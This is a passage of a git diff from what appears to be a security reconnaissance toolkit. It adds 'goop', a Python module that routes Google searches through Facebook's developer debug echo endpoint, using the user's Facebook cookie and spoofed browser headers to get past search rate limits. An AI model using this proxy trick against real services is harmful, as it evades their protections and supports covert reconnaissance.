 if not args.favfile64 and not args.favfile and not args.favurl:
 	parser.error( 'missing favicon' )
diff --git a/goop/__init__.py b/goop/__init__.py
new file mode 100644
index 0000000..df9144c
--- /dev/null
+++ b/goop/__init__.py
@@ -0,0 +1 @@
+__version__ = '0.1.1'
diff --git a/goop/goop.py b/goop/goop.py
new file mode 100644
index 0000000..e7b5463
--- /dev/null
+++ b/goop/goop.py
@@ -0,0 +1,63 @@
+import re
+import requests
+
+try:
+    from urllib.parse import quote_plus as url_encode
+except ImportError:
+    from urllib import quote_plus as url_encode
+
+def decode_html(string):
+    "decode common html/xml entities"
+    new_string = string
+    decoded = ['>', '<', '"', '&', '\'']
+    encoded = ['&gt;', '&lt;', '&quot;', '&amp;', '&#039;']
+    for e, d in zip(encoded, decoded):
+        new_string = new_string.replace(e, d)
+    for e, d in zip(encoded[::-1], decoded[::-1]):
+        new_string = new_string.replace(e, d)
+    return new_string
+
+def parse(string):
+    "extract and parse resutls"
+    parsed = {}
+#     pattern = r'''<div><div class="[^"]+">
+# <div class="[^"]+"><a href="/url\?q=(.+?)&sa=[^"]+"><div class="[^"]+">(.*?)</div>
+# <div class="[^"]+">.*?</div></a></div>
+# <div class="[^"]+"></div>
+# <div class="[^"]+"><div><div class="[^"]+"><div><div><div class="[^"]+">(?:(.*?)(?: ...)?</div>|\n<span class="[^"]+">.*?</span><span class="[^"]+">.*?</span>(.*?)</div>)'''
+    pattern = r'''<div class="[^"]+"><a href="/url\?q=(.+?)&sa=[^"]+">'''
+    matches = re.finditer(pattern, string)
+    num = 0
+    for match in matches:
+        # parsed[num] = {'url' : match.group(1), 'text' : match.group(2), 'summary' : match.group(3) or match.group(4)}
+        parsed[num] = {'url' : match.group(1), 'text' : '', 'summary' : ''}
+        num += 1
+    return parsed
+
+def search(query, cookie, page=0, full=False):
+    """
+    main function, returns parsed results
+    Args:
+    query - search string
+    cookie - facebook cookie
+    page - search result page number (optional)
+    """
+    offset = page * 10
+    filter = 1 if not full else 0
+    escaped = url_encode('https://google.com/search?q=%s&start=%i&filter=%i' % (url_encode(query), offset, filter))
+    headers = {
+    'Host': 'developers.facebook.com',
+    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'deflate',
+    'Connection': 'keep-alive',
+    'Cookie': cookie,
+    'Upgrade-Insecure-Requests': '1',
+    'Cache-Control': 'max-age=0',
+    'TE': 'Trailers'
+    }
+    response = requests.get('https://developers.facebook.com/tools/debug/echo/?q=%s' % escaped, headers=headers)
+    cleaned_response = decode_html(response.text)
+    parsed = parse(cleaned_response)
+    return parsed
diff --git a/quickhits.py b/quickhits.py
index ed54682..b390019 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -93,7 +93,7 @@ def testURL( url ):
     #     url = url.strip('_')
 
     match = title_regexp.search( r.text )
-    title = match.group(1) if match else '-'
+    title = match.group(1).strip() if match else '-'
 
     ljust = 100
     while ljust < len(url):